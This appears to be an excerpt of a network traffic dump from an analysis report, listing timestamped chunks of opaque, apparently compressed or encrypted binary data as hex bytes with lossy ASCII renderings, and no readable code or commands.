                                                                                                                                                                                    2023-01-05 07:59:30 UTC16876INData Raw: 08 46 4f 73 a9 40 54 fd 2d d1 dc 47 4b be 42 87 b3 83 89 4c b3 91 5d 02 f6 03 b4 de 5c c8 4e db 95 67 ca eb 9c 5c 17 6b e0 4d 44 9a c0 b4 25 32 03 fe 7f e6 ab d8 33 45 fc 78 8d bf 55 67 f3 b3 fa e8 92 fa b6 68 5f 79 b0 09 02 e2 36 52 76 d7 9f 27 24 87 6b b7 ad 8d 45 ba 0f 7b c5 84 8b ed 93 9f 5a ec e7 7d bc 5b 44 06 61 6d eb 12 27 93 a9 46 29 bd 08 9c 3d ee 2d dc 47 ad b5 58 26 8a 13 42 87 48 61 b0 bc 74 33 cc 18 78 89 49 f6 26 b0 0a 05 2e 0e 0b 68 15 42 a6 83 07 f3 32 cd 02 c0 33 a1 c7 7f cb dc 75 c0 71 c6 e2 3b bd 46 05 6e e1 1c c1 2a 1d 8e 16 71 91 ba 41 50 75 fa dd a9 17 d0 ae 96 e5 41 31 c9 90 03 6f 34 0d 69 83 2a 16 03 40 07 57 bb df 75 4b cc 0d 2c 56 60 cd ab 7f 3a 44 c2 3b aa 2d f6 bc 89 6b d6 66 b2 26 16 3b e6 5f b7 81 a0 2b 7b 94 a9 62 e4 e3 f1
                                                                                                                                                                                    Data Ascii: FOs@T-GKBL]\Ng\kMD%23ExUgh_y6Rv'$kE{Z}[Dam'F)=-GX&BHat3xI&.hB23uq;Fn*qAPuA1o4i*@WuK,V`:D;-kf&;_+{b
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16892INData Raw: 90 ce 30 e3 5d 8b e9 08 2a d6 f4 43 48 bd 40 4f d0 9b a9 97 65 3d 20 95 4b c5 0e f1 21 54 bd 84 bb ec 86 96 e2 45 27 7f e0 78 65 2b a5 d2 54 9f ae 32 31 2f 65 c9 cf ab 2c b5 f4 37 3e fc 9c e9 21 3d cb 08 bf 47 e4 0e 87 d2 ed fa 15 aa 1b 1c 15 1b 3e 99 49 e1 be c7 c5 30 e3 c1 27 81 ec 68 b9 d2 b3 56 c5 34 13 80 10 17 f3 87 8e 90 d9 1d e4 01 cb 09 a9 6c 06 bd cc d0 cc be 77 b3 45 77 a4 81 1f 3a da 12 b2 bd bc b4 7c 70 b9 94 88 e6 15 5c 9c 4b 44 9b d2 88 41 bc 3c 78 c5 ac 0c 81 80 2e d1 52 ea 12 ab 7c 88 81 af f0 56 3e 32 54 aa 96 a9 ad c7 7e e4 97 4e fc 0c 6d 6d 52 d4 a2 0d 58 b5 38 b4 23 80 31 e4 0d 41 fe 72 4b fa 65 06 bc 27 75 33 a8 d7 cc 9e ce ab 3e 5e 0c 41 13 35 ea c4 76 4b 78 37 f0 ff a7 54 43 b4 c1 90 08 66 0c a9 10 52 18 82 39 b8 ec 0a ea 8d 28 97
                                                                                                                                                                                    Data Ascii: 0]*CH@Oe= K!TE'xe+T21/e,7>!=G>I0'hV4lwEw:|p\KDA<x.R|V>2T~NmmRX8#1ArKe'u3>^A5vKx7TCfR9(
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16908INData Raw: 87 36 32 f7 f3 0c de 90 e3 c8 ef f8 a2 55 d4 1b 0b 70 27 15 e8 dd 85 cb 5b f4 e5 48 32 bf 39 a8 5d 71 40 ca 64 c5 0c b9 35 55 91 4b 4d 1f a3 85 91 c7 2e c4 96 70 24 9b 5f 84 50 4b 98 1b fa 29 3f 0f 5f 78 b8 c9 4c cf 86 c1 fb 12 fa 15 e9 38 f2 c0 c4 03 3e e6 c5 a5 ef 6a 5d bf a9 55 90 78 41 a7 3e 5b c9 b8 aa 6c 81 4c ce 6c 0e 1c a7 20 f4 63 c6 c8 43 2b e9 37 99 3b 21 fe 4f 03 3f 5e 67 ae 8e 60 f9 55 9f 46 c4 b7 6b db 6a bf 98 45 10 1d 71 1a 93 ce 69 21 32 a1 6d 1a 82 72 58 6e 4d f2 08 97 ae 56 9c 9d 83 89 b2 ab ff 9a 70 e0 02 4b 95 15 a5 15 52 be 91 91 2a 6c 30 07 e3 22 ca eb bb 95 df eb be 9f 73 e4 c2 15 89 b1 11 49 37 b7 d0 bc 24 eb 55 d1 54 73 7b 9f 1a 0b ea b2 b3 13 21 80 f7 8a e8 d3 b7 31 30 e0 86 e6 c4 6c 4d c2 5c b5 4c e9 4d 60 f2 bd 4c 89 45 f3 5f
                                                                                                                                                                                    Data Ascii: 62Up'[H29]q@d5UKM.p$_PK)?_xL8>j]UxA>[lLl cC+7;!O?^g`UFkjEqi!2mrXnMVpKR*l0"sI7$UTs{!10lM\LM`LE_
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16924INData Raw: 7e e6 60 12 7b 33 cd 06 0d f8 cf 16 0e c6 b1 50 5a 79 3c 32 60 48 6b 23 0a d8 dc 9b 10 cd ec cd ba 9a f2 e7 0f 79 1d bc 24 ae 93 18 6d b3 31 42 6d bb f1 69 d9 a8 9d c8 07 1e 2a de 7a 2f d9 e3 c7 ce 57 8f da 48 ff e4 9f c2 1f 3b 44 6a e4 3d 7a 17 35 26 f2 50 1d b2 78 5f b4 b2 ba d7 7f 29 fe 4f a5 84 d5 2d 4d f2 05 3f 08 8c 6d 6c 67 8d d3 00 7b 1e 26 c9 7b 17 58 90 21 42 86 94 ca 78 49 4f 32 ab b7 1e 26 8b e4 ad cf 4a c7 2c a1 c4 2d 47 06 5d 3a 40 ab 72 de ed 0f 2d 38 bc 76 47 6e 40 3d bc 19 d9 4d 96 16 8e 3e d4 98 a6 5a 9d 4e a4 a4 4e 70 22 89 e1 cc e6 9a 40 6c 55 e1 ec e8 91 b5 94 95 8b 2e 36 23 33 f9 f6 06 29 d4 a5 f6 9d 84 e8 74 80 a8 35 02 d2 45 0f 03 35 9e d2 23 af cf a5 c8 df 2e c3 7e 83 a4 7a 92 ad 12 3d 05 fa aa 52 62 ba f2 7a 13 cb 88 48 75 ea ee
                                                                                                                                                                                    Data Ascii: ~`{3PZy<2`Hk#y$m1Bmi*z/WH;Dj=z5&Px_)O-M?mlg{&{X!BxIO2&J,-G]:@r-8vGn@=M>ZNNp"@lU.6#3)t5E5#.~z=RbzHu
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16940INData Raw: 60 db 5b af cc 61 e6 2f 9a 51 f3 7e 5c 6a 15 2e 5f d0 a8 c6 bc 6d 67 9b 11 76 64 4c 32 5a 6c 2c 76 7b 7b b6 b1 19 64 63 5b ad 66 69 aa 31 5d 79 78 84 9b 6b 8c c9 fd 19 81 d8 2d 4d bd 79 06 94 a4 7b 75 21 89 3b f6 dc e0 e3 99 03 10 72 d8 f1 a6 fa e4 8e 2f ab 1e f1 84 11 d9 c2 52 6d c3 c7 97 f2 c9 9a cb 94 f2 3c fd 98 60 5d ea b4 7e 7c c5 79 ad af ee 96 85 68 57 e6 0d 47 0a 1c ce a6 1d 84 96 75 f3 69 42 3f 35 f6 47 e2 eb f2 7d 22 63 47 ed d5 a6 a1 7c 31 79 d2 63 39 fb 2e 3c 72 0c c5 85 38 56 c0 60 38 b0 0a 44 6e 24 d9 f7 20 f0 19 4f e3 bf ba 79 eb 35 d6 f1 9c 51 73 81 8f 9c c2 15 2e 9b 7b 18 5f f7 b5 ad 23 a5 ef b7 94 59 1d f1 f0 11 bf 87 b1 88 d8 a0 85 98 b4 92 37 77 46 f8 20 a0 e6 6e 66 e4 95 93 26 6e 59 6b 5a 9e 2a 79 db 5f 66 3a 87 f4 df 26 14 d7 1c 2a
                                                                                                                                                                                    Data Ascii: `[a/Q~\j._mgvdL2Zl,v{{dc[fi1]yxk-My{u!;r/Rm<`]~|yhWGuiB?5G}"cG|1yc9.<r8V`8Dn$ Oy5Qs.{_#Y7wF nf&nYkZ*y_f:&*
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16956INData Raw: a2 4b ae 47 16 95 bd 9b 79 e5 f5 4e fa 2b 3e 8a 1b a6 da 18 8c 80 9d e1 7e 7f 26 3c b6 a0 98 3c 69 72 b3 3f af 04 fc e4 55 49 ef df bd 5c 99 8b 7c f6 50 23 81 73 4e 82 1d 51 1f 65 51 7a 71 19 55 9e 84 bb 64 36 7a 6f cb 50 be 20 fc 8d 80 88 4e 4b d0 bb 56 cc 8f 73 de 43 3d d7 e3 d6 8e 2e ad 6f 96 bb ff 93 32 db 09 f4 d2 a5 4e f8 7e b7 41 d2 03 c4 28 2a 77 18 9e ac 91 3f 87 26 1b 42 dc 5b 26 41 61 dd 3c b1 ed 76 67 91 35 62 e0 4b 82 ba e6 18 46 a1 3d eb 4e e2 65 55 ef 7f 7b e7 9e 1b 50 7c e9 79 60 39 2a 0a 60 10 2a 5e 97 06 b3 37 4c 10 80 38 67 91 81 fd ac 28 a9 0c 43 4f cf 4a 37 7f 6c 1c 84 f3 37 54 45 e5 f3 7d 9b bb 5f 39 76 a6 95 7a 49 cb 40 83 59 50 38 51 f6 70 9b 7f 5c bc 1f 89 49 59 00 4b 0f 12 f1 96 b4 eb cd f0 7d 82 51 d3 92 8b aa c2 d5 8c b9 d3 e5
                                                                                                                                                                                    Data Ascii: KGyN+>~&<<ir?UI\|P#sNQeQzqUd6zoP NKVsC=.o2N~A(*w?&B[&Aa<vg5bKF=NeU{P|y`9*`*^7L8g(COJ7l7TE}_9vzI@YP8Qp\IYK}Q
                                                                                                                                                                                    2023-01-05 07:59:30 UTC16972INData Raw: 52 f2 26 02 6f a3 f9 7a 33 a3 5a e3 db e2 32 38 1d b4 eb 9a 70 d6 2a 29 c9 4d 51 e4 18 45 eb 1e 16 a2 a3 3c b5 94 88 29 7c d0 b2 47 30 d3 7b ae 5a a3 c5 49 cd 94 eb 90 e0 cd ea 6f 3b 6a a4 e3 de c9 a1 35 6c 68 6a 78 2e a2 74 2a ea dd c6 00 d2 72 27 a3 2d 74 6a 7d 62 99 a0 4f cd da 60 8c 95 2d 4f e6 7c 00 b4 2e 27 52 e4 d8 e0 2a fc 82 b2 54 6c c4 95 03 c1 da a6 13 29 65 57 2d c1 ba 61 59 ae a4 e6 70 8c d1 4d 59 fd 18 02 0c 1c c1 c8 4d 29 cc 9e f7 ed 35 38 38 8e 20 9a 28 1f ed 50 5d 97 7c e7 94 1b b6 5b 04 30 03 3d 9d 7f 6b eb 04 d4 62 e7 0d b0 bc ac 57 60 12 57 06 e1 56 05 54 e0 8b 21 53 ae 23 69 3f b5 4c db 82 ca 40 2a 3b 58 f5 4c 28 e7 87 74 81 f2 1d e8 29 26 f1 92 1e 10 a4 81 45 3f fd 01 42 ff 60 1c 01 99 4e d8 7f 2e e3 32 21 a4 85 5a f0 a2 6a 56 8a 14
                                                                                                                                                                                    Data Ascii: R&oz3Z28p*)MQE<)|G0{ZIo;j5lhjx.t*r'-tj}bO`-O|.'R*Tl)eW-aYpMYM)588 (P]|[0=kbW`WVT!S#i?L@*;XL(t)&E?B`N.2!ZjV
                                                                                                                                                                                    2023-01-05 07:59:31 UTC16988INData Raw: 4d bc 87 01 ba de 9d ff f1 e7 5c ec 0a 7c b3 31 e9 76 b1 14 19 61 a4 d8 5a b0 0f b4 bf 93 a3 1f 62 3a c3 64 35 24 35 67 08 2d f8 0c b5 f5 93 08 3b cc c9 e3 ce 2e ae 05 11 e7 a9 04 10 b9 1f 82 cf c1 50 6c 11 9f 33 cc 09 df 7d 04 22 37 89 f8 d0 cd 6a 00 64 9f 4c 8f a8 90 68 3b 70 55 ed b6 56 da b3 51 4f 85 fe 78 bf 30 99 78 dc ff a2 71 08 7c 3a 57 72 75 b7 9d 0d b4 a4 ea a4 3f 81 d8 1a 87 1a 6a a7 a7 bf 78 21 f9 2e 6c 43 2a d5 53 64 c3 b7 8b a9 8f 4b 04 c8 9f 32 2f 93 7a 77 1f e0 39 d9 a4 82 9c 63 cc 49 4c b0 0d 1a e0 68 15 6a 4e ca 8d fe 06 c8 c1 b3 73 4f 9c 1f ae 69 1e 5a 02 79 6d 14 46 88 ad aa 02 4e b0 ff d8 dc 62 1b 16 8d 48 c8 7a f2 d3 68 ea b4 27 4d 70 d2 5b 62 00 ae 11 5d 58 ad 60 c2 fd c0 3a 0c 39 3d 30 84 4d 34 93 42 b1 c6 8e 69 c0 81 52 13 9d 08
                                                                                                                                                                                    Data Ascii: M\|1vaZb:d5$5g-;.Pl3}"7jdLh;pUVQOx0xq|:Wru?jx!.lC*SdK2/zw9cILhjNsOiZymFNbHzh'Mp[b]X`:9=0M4BiR
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17004INData Raw: d3 f4 09 01 c6 19 1c f9 2f 9a d9 7c ec 80 a7 cd cd 3b 6e e2 d2 9e 12 92 36 78 bb 79 ab 8b c9 fe 20 c2 6d 8e 1d dd b7 03 94 75 b6 c9 25 1d 1f 3c d1 39 6f 31 e5 c9 9f 1c d7 c7 d4 7e 48 db 56 fb ba 40 6c b3 31 78 26 2e a4 27 3f b1 32 34 2c 10 eb 1b a9 6f 4e 92 bc ca 9e ec 59 7a ee f9 36 90 f4 e4 d3 79 e9 c1 c5 a1 d0 4b b8 76 d6 4d d3 0d 40 43 ea 5a c9 33 72 7a 03 7d 64 8c fe b5 02 86 ca 4a 7a 06 1f 47 d5 c1 91 a7 e6 d8 b8 66 07 fc 9f 4c 36 32 7c 33 a5 7a c6 9e a2 4f 04 87 bd 6b 14 7e 7e c5 b9 39 1c e8 42 20 b7 56 fb 3d e2 de 4a 6c d3 21 3d 30 bc 34 01 83 4d 8c 14 d2 47 49 5f 00 33 56 b5 d1 63 6c 76 52 6e 59 1a 21 ac 3c 95 2a 01 aa 36 24 e0 44 d0 38 70 3e 2f 0e e5 f4 93 79 41 db 99 c9 ef 0b 19 b3 d8 e1 c0 e4 6a 80 a0 fc b5 29 5c 05 28 0f 14 cb 12 bb a6 b1 f5
                                                                                                                                                                                    Data Ascii: /|;n6xy mu%<9o1~HV@l1x&.'?24,oNYz6yKvM@CZ3rz}dJzGfL62|3zOk~~9B V=Jl!=04MGI_3VclvRnY!<*6$D8p>/yAj)\(
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17020INData Raw: a4 19 67 dc 8b 01 72 44 20 00 cd 69 2b ad cf 95 b5 6e e5 22 73 be 68 dc e2 3c 8f 21 74 f4 68 6f 97 3d 23 5b 48 14 3f b6 3e 55 37 de 24 48 dd 41 84 30 1a 7c e8 10 5d 71 dc 1c 4c 67 ee 7e b6 c8 1a b0 51 4c e3 08 ba 8b d1 89 64 15 ae 2d 91 76 fc 15 a8 56 be 21 5d a7 a8 70 67 c8 52 a8 22 1b 28 b0 93 75 3d d2 f3 db d4 6a a5 ea b2 ac 9e 39 52 b4 7b 1a 5c e9 ba 5c ce 39 65 13 f7 9e ef 27 b9 59 51 ab 27 32 bb 70 95 d6 32 f6 38 70 9f c3 37 42 a8 d4 63 04 66 af 6d 3b 32 a1 a1 ad d9 20 38 26 ae 55 2e 29 44 eb 38 91 26 aa f8 f8 6b fc 8c bf 3a a6 b1 f4 c8 29 54 7c 8a d4 f8 90 f3 2e cc ec 9b 38 30 ab d9 c8 6b 63 39 08 68 5b c5 70 ff 31 89 49 69 6c 45 9d 44 9a df 89 fb b7 75 b5 76 25 da 14 35 58 f3 78 2e 15 2d 2f 31 4f 1a 3f b8 46 fb 68 66 a1 98 96 81 1a 16 d8 d2 d0 18
                                                                                                                                                                                    Data Ascii: grD i+n"sh<!tho=#[H?>U7$HA0|]qLg~QLd-vV!]pgR"(u=j9R{\\9e'YQ'2p28p7Bcfm;2 8&U.)D8&k:)T|.80kc9h[p1IilEDuv%5Xx.-/1O?Fhf
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17036INData Raw: 6d 20 59 3b fe 13 45 06 c9 78 5d 54 77 8e 9e a5 bd 88 66 43 d7 fb c4 22 19 f7 41 dd 1b d5 70 d6 cf 91 1d 7b ce 04 93 69 38 5e 36 8a ec a5 b2 85 57 ce b5 50 85 d9 34 df 8f 29 67 18 aa a0 04 98 33 19 a4 ba fe ec 05 6a e9 b5 f6 bb 5b 63 b1 06 8e fd c2 02 e1 ed 57 e5 e8 9c 74 99 74 95 84 04 bf f4 fe a8 ed b7 c0 4c 5a 5b aa 04 9e 62 cd a7 2f f1 d4 75 fd 82 7e a6 81 ad 21 bc 45 ec c1 e5 6c 7e 5c 85 9f 0a a9 92 ec b0 44 79 a4 81 6f 7c a1 8b 4a 20 a1 f9 83 cb 79 7b a2 fa 8e 14 83 07 97 97 05 a9 f4 27 19 63 4a d1 20 be 83 23 d7 18 22 19 97 1d 13 48 3a 79 75 03 10 d3 03 ba 0c 30 88 42 7d 69 60 f8 37 e1 05 a0 29 8e 81 c5 80 97 a4 b9 c9 b0 4b 85 4b e7 29 57 85 98 4c 70 6e 0a 92 84 ec 3a 89 01 2b 07 49 fa b7 9d 81 6b 2f c3 93 c1 69 82 b4 2a d4 63 74 46 a0 ed 01 88 60
                                                                                                                                                                                    Data Ascii: m Y;Ex]TwfC"Ap{i8^6WP4)g3j[cWttLZ[b/u~!El~\Dyo|J y{'cJ #"H:yu0B}i`7)KK)WLpn:+Ik/i*ctF`
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17052INData Raw: 29 b5 90 72 ac 11 36 39 0c 78 71 ee 38 76 8c 97 76 05 b1 0c 33 05 c1 d1 63 f1 bf 26 1f 4e b0 48 03 b4 60 53 c4 2d 93 95 70 a4 08 5c 0c 4a 15 d7 67 f3 3f 0a c4 1c 96 03 89 83 f5 2f 21 8b 32 dc c9 8d b9 df 33 2c 30 6c fb 1c 39 59 89 c4 fd 5c 01 81 5d cf 6f 4e d6 6b b6 52 ea 70 23 b3 49 12 51 cd 13 64 cb b1 97 2e 16 5b 38 d7 bc 20 7e 29 47 bf 3a 58 3e 8b d9 9e da b4 42 db f1 dd a1 b0 56 2e 75 c6 08 76 ef a1 77 f0 6f b6 a7 c8 f0 f6 76 78 1b 8d 82 b4 7c f9 f9 2b fa fd 86 95 85 60 70 76 08 d7 29 67 26 0c 51 99 d2 32 d5 f7 35 9d d4 fa 62 df 51 17 69 3d 73 96 cf 74 79 c8 6f 9f 5d 25 aa df 7b a0 fc 6d 25 34 8c f1 44 f0 97 b8 3f 84 a2 54 66 1e fc ca 38 8c 5f f8 00 a0 49 0e 33 e4 bc fe fd 86 8f 53 de ad 76 17 97 1b eb 65 b6 4b 7c 02 89 bb 17 dc 74 9b 6d 9b fc d7 32
                                                                                                                                                                                    Data Ascii: )r69xq8vv3c&NH`S-p\Jg?/!23,0l9Y\]oNkRp#IQd.[8 ~)G:X>BV.uvwovx|+`pv)g&Q25bQi=styo]%{m%4D?Tf8_I3SveK|tm2
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17068INData Raw: 10 ad 10 17 12 8c 97 ff 73 77 f7 5e d7 80 78 0d 27 37 15 d7 70 49 4a 0d 9e 7b b3 fb 12 be 2a 39 3b 82 98 57 12 eb 75 f7 49 d3 22 28 d8 fb df a7 5c a3 65 05 73 6a 8e e7 47 37 24 91 f5 03 80 09 41 e8 91 1b ae f4 dc e2 27 e1 a5 4c 39 fd de 02 16 9b 70 a1 b9 3b 7d 58 30 67 77 eb d3 a0 18 8e 2c a4 f6 fa ea b7 33 51 af 93 54 69 e4 94 da 20 9a fc b8 7b 4d c5 d1 4c 69 0e 81 31 30 ff 0e 05 45 d4 23 4e 7d 31 f5 ec 8d 09 2a 72 0b ff 86 82 da 8a bf 0b f3 c4 c0 ca 66 9b c0 86 8e 94 86 fa 9c 85 bf 39 34 6d 17 10 51 e1 9e f7 29 68 72 9a 9f da a8 f7 b1 99 dd 13 03 89 24 97 df 33 c1 64 0e 79 e4 9a c2 08 a6 28 3e d4 85 84 80 58 a1 98 bf 92 a6 c3 8e 65 d8 85 9f 53 6a ba b7 ad 2b 19 e9 af ce 4c d6 ef 09 e4 40 d1 15 0a c6 95 bf 16 9c 89 ef f0 05 bb 54 db d7 07 f9 19 82 b1 06
                                                                                                                                                                                    Data Ascii: sw^x'7pIJ{*9;WuI"(\esjG7$A'L9p;}X0gw,3QTi {MLi10E#N}1*rf94mQ)hr$3dy(>XeSj+L@T
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17084INData Raw: ab ab 49 75 ca 62 45 f6 60 10 aa 70 e2 95 3d 6a 11 57 1d 2a 8f 6a 0c 50 ca af 9c 45 44 57 e1 4d 76 42 c7 89 fd f8 ea ad d2 33 d5 b3 fe e5 9b d7 f0 13 d6 ee fc da 85 c1 c1 9d 93 c1 82 a8 c4 79 53 6e 8b e7 96 76 72 cd d4 1a ae 45 12 95 30 35 b1 7c bd 04 04 e6 89 04 2a a4 88 d6 9e 15 4a 30 5f 4c 1f 8c 9a 16 09 33 c5 cd 13 d8 06 57 bf bf 79 27 4c 04 27 87 5b 4b 18 46 05 29 c0 31 ee 27 8a 3c 35 f1 43 e7 0b 79 51 79 cb 4f 63 79 4d 82 be b6 4e 53 25 e1 b9 bf d5 69 cf 9d 3b dd 55 26 b4 aa a9 25 9c 67 b6 81 78 0d 8c bc 29 82 54 ab 44 b4 ca c8 36 24 a0 ac 4e 35 2d f8 5e 56 f7 77 ea 8f eb 5c 0e 8e 7b 79 6d c4 8e b5 84 52 98 cd dc 89 70 f7 10 38 e3 80 12 93 27 9e 2a a5 50 2e 8e 81 45 cd d2 1a dc da 1d c1 63 35 37 8c 0c 0c 99 83 c4 46 d3 f5 fa 1e 9e df 5a 3c 74 9b 6a
                                                                                                                                                                                    Data Ascii: IubE`p=jW*jPEDWMvB3ySnvrE05|*J0_L3Wy'L'[KF)1'<5CyQyOcyMNS%i;U&%gx)TD6$N5-^Vw\{ymRp8'*P.Ec57FZ<tj
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17100INData Raw: 2d 1c e7 a7 cd 66 30 a3 be 37 47 51 47 7d dd f8 b1 df ea e5 4f 4f bf 0f da 5c 8e 67 3c 12 bd 52 1b 1f d6 ab e5 bd cc 19 d9 1c 09 f1 a7 c4 3d e8 41 2d 47 9f f9 fd 63 87 04 93 fe 58 8b cf 4d e9 6e 1d b9 48 cb 78 ec af f9 46 be 8f 11 a5 fa 11 be ed d6 fd 2b 9c 80 ff cd d5 33 a7 53 3f 21 88 c3 0f 01 98 e5 04 41 cb 2c ef 22 e8 7c 70 14 40 fd 56 26 7b db 97 e1 cb 6c 27 5c df 1d 5d b0 c3 e3 06 5c fd 75 91 b0 44 1a 7c 0d e7 db 33 cb 15 83 83 cd 07 b9 bd ef 36 32 54 d7 71 ea a5 35 11 58 04 a2 a1 e1 cd 83 21 e5 51 4b b5 1a e3 58 24 74 b6 3c 42 9a c6 b4 00 1e e3 c4 48 d1 25 c6 7a ea c4 d2 3f ec 68 24 ec f8 06 47 d0 7b 3a 90 6a 71 2c 6c 74 c9 be f9 8b f0 7c 43 1c e8 f3 55 ca a2 df 8c 73 60 f3 0f 30 92 54 87 48 9a 02 df ba 32 7c 9e 17 18 a7 7c 48 aa 0e ce 32 a2 f7 68
                                                                                                                                                                                    Data Ascii: -f07GQG}OO\g<R=A-GcXMnHxF+3S?!A,"|p@V&{l'\]\uD|362Tq5X!QKX$t<BH%z?h$G{:jq,lt|CUs`0TH2||H2h
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17116INData Raw: a1 ea ae 50 e2 2b 49 22 10 e1 5f fd 7c 1c 8b 7f 89 f7 d6 9b 95 a7 34 28 9f 4e 9d 0a db d8 07 39 27 ae 1d 99 29 2c 60 d0 c9 88 4b af 0e ce 5d 28 8c d7 cd 41 8d 0f 33 89 b1 6f 77 db 06 49 0a 3f 6d f4 e0 bf 79 03 11 5f c5 39 a6 b8 9e 06 c7 3e 6b da 45 24 86 9f 77 ff e7 fd 54 44 74 e6 2a 54 d9 cc c4 67 06 b3 d1 b7 81 1d 0c a2 76 7b 9d 68 61 93 6c 5b 73 fe 28 90 92 a7 44 8e 6a 91 d5 d2 9e ec 03 cb 63 8b 1e 6e 8a ab 93 c8 73 db 4e 13 df 49 26 0e d1 4b 08 1e c7 5c 47 8e 56 6c ed 68 53 90 d7 48 c9 b4 a5 76 6e 36 2c 61 eb ef fc 5a 60 8b 82 8a 70 6f 9f 67 f2 bd a2 da 38 1a a6 68 82 87 ea 48 1f 37 64 3e bf 8a d4 c0 4d 6e e0 3c cc 4e a6 6a 2c 90 1c cf e8 ba 51 7d 5b d8 ab a0 be aa 92 c8 de ef 79 a0 6a f1 79 70 ea 11 49 75 66 c4 08 57 c8 2e 6e 65 b0 db 62 a4 bc 79 b6
                                                                                                                                                                                    Data Ascii: P+I"_|4(N9'),`K](A3owI?my_9>kE$wTDt*Tgv{hal[s(DjcnsNI&K\GVlhSHvn6,aZ`pog8hH7d>Mn<Nj,Q}[yjypIufW.neby
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17132INData Raw: a4 f5 56 fe bb 94 ea 0c 58 98 01 a3 c4 c0 ba d3 cb 82 02 26 12 f5 0e 11 7d 14 82 eb 5f f3 02 41 7d 6e 53 29 fd 1b d7 e9 03 47 b5 fe 83 78 ca 2c 63 a6 c0 04 55 6b d8 30 d1 40 02 7a d6 28 d6 6e 65 91 22 ec 53 53 2b ae 9d dd 79 d9 85 f0 4a df 09 b2 fa 23 38 02 6e 45 22 b6 8b 8d fc 39 ed e7 0a a7 9b 62 80 92 a3 de 8c 99 76 d3 ee ea 37 40 19 b4 cb 1c 82 1d 03 f6 fd 75 0a 7e e9 d7 08 83 79 cd 62 39 ca 3f 19 65 40 5d e2 bb 95 e4 f2 7c 11 55 ce 84 95 5a 11 d6 6b 87 2f a3 49 1b 00 a2 b3 05 83 04 c0 00 71 09 b8 8a ee 5c 21 9a 3b dd c2 71 86 0d d4 e5 67 b0 49 2e b3 98 ce 61 6c 57 dd ff 6c 7e 7f 0b 23 72 ed 65 be 00 61 f4 5a 5d bc 4e 64 8a 59 a8 a4 8a cf e8 0e 20 e8 d3 9b 54 e8 c5 7c 58 b2 69 90 4b 3b 6c 66 1c 26 ec 24 02 51 5d 28 16 7a 52 b9 52 27 82 8a 23 20 8a ff
                                                                                                                                                                                    Data Ascii: VX&}_A}nS)Gx,cUk0@z(ne"SS+yJ#8nE"9bv7@u~yb9?e@]|UZk/Iq\!;qgI.alWl~#reaZ]NdY T|XiK;lf&$Q](zRR'#
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17148INData Raw: a7 cc da 09 11 f9 3e 96 04 fb 87 0e d6 c6 b0 c8 97 a5 6d b1 a7 4a 82 62 65 e0 6d 3b ec b0 01 fe 85 cf 5d aa 78 0b 0d 30 a5 3c 62 ad c0 15 d2 3e 1f c0 7e 48 e2 2e d4 3a 7c 33 e5 19 37 44 e8 9e ad e3 56 2d b2 05 36 81 5c 17 92 d4 6c c9 bc 44 89 e9 73 f9 7e 26 cf 61 63 b7 3b c9 09 29 b5 58 55 e4 55 61 c4 32 44 51 4f 85 88 ac 3e 39 41 7d 00 6d 61 e0 38 8d 48 e6 ed cd 63 1f d8 18 d0 bb fb cd 8a 29 23 8a 54 b7 32 4a ec a8 d8 fc 28 f5 fc 4b 79 1f 20 e8 9b 9e fc ee 91 e6 a1 d2 b9 51 c2 a9 e1 5b 2e f5 9c 42 15 5d d7 53 6e da 43 3f dd 15 fd 3c b6 de fc 01 b7 50 67 cb 93 09 ef 1c d4 90 a2 7f 28 4d b8 21 91 a8 49 27 d0 08 1d 78 34 db ef 31 bc d4 d3 10 3f 31 0a 9e d6 e0 6f 52 1c 53 f1 9a ed 17 c0 94 bf 7a f2 d9 43 5f b6 aa 48 a0 bb 03 2d ec d4 e8 20 d9 b7 a5 80 66 c9
                                                                                                                                                                                    Data Ascii: >mJbem;]x0<b>~H.:|37DV-6\lDs~&ac;)XUUa2DQO>9A}ma8Hc)#T2J(Ky Q[.B]SnC?<Pg(M!I'x41?1oRSzC_H- f
                                                                                                                                                                                    2023-01-05 07:59:31 UTC17164INData Raw: f6 3f c8 f4 0e 53 ee 91 4f 5f b5 96 fa f0 f6 21 46 43 43 50 17 f8 79 be 3f 86 f7 33 e7 29 99 84 42 86 9e b4 d8 d6 ab b5 cb 58 2b e5 78 f6 71 21 13 e1 f9 a9 91 f9 ac fe 1d 22 37 ad a2 b5 8f 7c e5 33 03 ae 3e b5 c8 74 77 22 70 20 b1 d5 a9 d9 f6 77 af 32 db 03 bf 21 21 4b bb b5 ec 0a 9e 2c 4b ef af 45 51 af 28 f3 7b 3d 5f cc b5 20 20 8b 72 79 9f 32 ee 2a 23 62 e6 3c be af f2 fa 77 2f 71 80 09 67 0d bb 66 0b 9e c0 37 7d 9b 6e 24 f2 9e 94 37 3e e9 d8 17 22 2e 06 91 c2 b1 29 70 15 93 81 55 44 64 81 bd 4c 1b 1f 79 26 26 4c 9f 22 44 2f b8 cc b7 28 c4 ea d1 69 68 05 00 e6 4c 48 dd 09 34 fe cb a9 69 6c 29 1e ee a5 89 76 80 f0 60 2d a8 7a ad 9b 59 fd 62 71 1d 9b c2 42 7e 35 6a ee fc d4 b8 7b fc 9e 47 ac ca fa 75 25 a2 2e 55 0a f0 9e 49 57 44 6d 69 c1 84 28 5d 85 0c
                                                                                                                                                                                    Data Ascii: ?SO_!FCCPy?3)BX+xq!"7|3>tw"p w2!!K,KEQ({=_ ry2*#b<w/qgf7}n$7>".)pUDdLy&&L"D/(ihLH4il)v`-zYbqB~5j{Gu%.UIWDmi(]
